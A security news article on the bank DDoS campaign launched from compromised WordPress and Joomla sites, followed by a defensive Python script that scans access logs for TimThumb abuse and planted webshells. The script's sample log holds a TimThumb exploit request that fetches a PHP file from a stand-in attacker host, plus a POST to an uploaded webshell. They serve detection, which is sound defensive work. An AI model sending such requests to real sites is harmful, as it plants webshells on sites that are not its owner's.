Bank Attackers Used PHP Websites As Launch Pads

Published : 22/11/2024   Category : security


WordPress sites running an outdated version of the TimThumb plug-in were among the PHP-based sites that attackers used to launch this fall's massive DDoS attacks, reports Arbor Networks.



The group that began targeting U.S. bank websites in September launched its large-scale, distributed denial-of-service (DDoS) attacks via a number of PHP-based websites that it had previously compromised.
That finding comes from Arbor Networks, which said that attackers had compromised numerous PHP Web applications, such as Joomla, as well as many WordPress sites, many of which were using an outdated version of the TimThumb plug-in. After compromising the sites, the attackers loaded toolkits onto them that turned them into DDoS attack launch pads.
"Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools," according to a blog post by Dan Holden and Curt Wilson, who are part of the security engineering and response team at Arbor Networks.
After compromising the PHP-based websites and loading their attack toolkits, the bank attackers then either connected directly to the sites to issue commands, or else used intermediate servers, proxies or scripts. The attack tool most used by the attackers, according to Arbor, was the itsoknoproblembro toolkit, which is also known as Brobot. Two other tools, KamiKaze and AMOS, were also used, but less frequently.
"Those tools enabled attackers to launch a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols," said Holden and Wilson. "The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, to multiple companies in the same vertical."
The scale of those DDoS attacks disrupted the websites of leading Wall Street firms, including Bank of America, BB&T, JPMorgan Chase, Capital One, HSBC, New York Stock Exchange, Regions Financial, SunTrust, U.S. Bank and Wells Fargo. That was despite the attackers announcing in advance which sites would be attacked, as well as the date and time their attacks would commence.
In late October, after more than a month of bank website attacks, the hacktivist group that claimed credit for the so-called Operation Ababil campaign promised a pause in its efforts. But the group broke its silence earlier this week, when it reemerged and promised to begin attacks this week against Bank of America, JPMorgan Chase, PNC Financial Services Group, SunTrust Banks and U.S. Bancorp.
Those attacks appeared to recommence Tuesday. A spokesman for PNC confirmed Thursday via email that the bank's website had been seeing "an unusual volume of electronic traffic at our Internet connection." But he declined to comment on whether that traffic had been caused by DDoS attacks.
According to Arbor, the new attacks looked similar in construction to Brobot v1; however, there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2, showing that the attackers' techniques are continuing to evolve.
What lessons can businesses draw from the Arbor finding that the DDoS bank attackers are using vulnerable WordPress and PHP sites as staging grounds? For starters, businesses should keep an eye on their websites for signs of outdated or unsecured PHP applications -- and not just to help prevent DDoS attacks. Indeed, criminals often use exploited websites to launch attacks and store stolen information.
"WordPress enables these organizations to set up an infrastructure on the Internet that exacerbates the challenge of locating them," said Jim Butterworth, CSO of HBGary, speaking by phone. "They're using it as an opportunistic technique for lifting stolen information, more so than using WordPress as an attack vector."
The gang behind the Eurograbber attack campaign, for example, reportedly used Zitmo Trojan spyware to steal $47 million or more from over 30,000 corporate and private banking customers. Although the gang used command-and-control servers to manage PCs infected with its malware, it had also exploited PHP websites to create drop zones for storing stolen information, as well as for pushing additional attack code to infected PCs. Using drop zones -- as a kind of criminal Dropbox -- helps attackers better cover their tracks and evade security defenses.
Despite those criminal tactics, Butterworth said businesses shouldn't avoid using PHP-based applications such as WordPress. Instead, they should inventory which PHP applications are being used, log network traffic to reveal inbound PHP requests that expose would-be attackers probing for such applications, and ensure that the PHP applications remain hardened against the toolkits and vulnerabilities used to exploit them. "Locate, patch and watch. That's the advice," he said.
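One way to put "locate, patch and watch" into practice for the two patterns this article describes (TimThumb abuse and uploaded PHP webshells) is to run the site's access log through a small scanner. The following is an added example written for this page, not code from Arbor Networks or HBGary. It assumes combined-format (Apache/Nginx) access logs, a hand-maintained inventory of the PHP entry points the site legitimately exposes (`KNOWN_PHP`), and an allow-list of hosts TimThumb may fetch images from (`ALLOWED_IMAGE_HOSTS`); the log lines are constructed for the example and use RFC 5737 documentation addresses.

```python
"""Scan web-server access logs for the probing and post-compromise traffic the
article describes: timthumb.php requests whose src= points off-site, and
requests for PHP files that were never deployed (a likely uploaded webshell).
Added example; the inventory, allow-list and log lines below are assumptions."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: the PHP entry points this site is known to expose. In a real
# deployment, generate this from the document root (the "locate" step).
KNOWN_PHP = {
    "/index.php",
    "/wp-login.php",
    "/wp-admin/admin-ajax.php",
    "/wp-content/themes/example/timthumb.php",
}

# Assumption: hosts TimThumb is allowed to fetch remote images from.
ALLOWED_IMAGE_HOSTS = {"example.com", "www.example.com"}


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def check_timthumb(rec):
    """Flag a timthumb.php request whose src= host is outside the allow-list.
    The whole hostname is compared, not a substring, so a host such as
    blogger.com.evil.example is not accepted just because it contains blogger.com."""
    if not rec["path"].endswith("timthumb.php"):
        return None
    for src in rec["query"].get("src", []):
        host = urlsplit(src).hostname
        if host and host.lower() not in ALLOWED_IMAGE_HOSTS:
            return f"timthumb src points off-site: {host}"
    return None


def check_unknown_php(rec):
    """Flag a request for a PHP file that is not in the inventory. A 200 means
    the server executed something you did not deploy (an uploaded webshell is
    the usual explanation); any other status is someone probing for such files."""
    path = rec["path"]
    if not path.endswith(".php") or path in KNOWN_PHP:
        return None
    if rec["status"] == "200":
        return f"possible webshell: {rec['method']} to unknown PHP file {path} served 200"
    return f"probe for unknown PHP file {path} ({rec['status']})"


CHECKS = (check_timthumb, check_unknown_php)


def scan(lines):
    """Return a list of (client_ip, reason) findings, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for check in CHECKS:
            reason = check(rec)
            if reason:
                findings.append((rec["ip"], reason))
    return findings


def by_source(findings):
    """Count findings per client IP so the noisiest scanner floats to the top."""
    return Counter(ip for ip, _ in findings)


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2012:03:14:07 +0000] "GET /wp-content/themes/example/timthumb.php?src=http://blogger.com.evil.example/x.php HTTP/1.1" 200 1344 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2012:03:14:09 +0000] "POST /wp-content/themes/example/cache/external_3a7b.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2012:03:20:11 +0000] "GET /wp-content/themes/example/timthumb.php?src=http://www.example.com/logo.png&w=200 HTTP/1.1" 200 8820 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Nov/2012:03:21:30 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Nov/2012:03:25:01 +0000] "GET /administrator/index.php HTTP/1.1" 404 310 "-" "curl/7.26.0"
"""

if __name__ == "__main__":
    results = scan(SAMPLE_LOG.splitlines())
    for ip, reason in results:
        print(ip, reason)
    print(dict(by_source(results)))
```

The second sample line is the one that matters most: a POST to a PHP file under the theme's cache directory that nobody deployed, right after a remote-src request to timthumb.php from the same address, is exactly the sequence that turns a neglected site into a launch pad. Run this against real logs and the inventory will need to be complete, or every legitimate plug-in endpoint becomes a false positive.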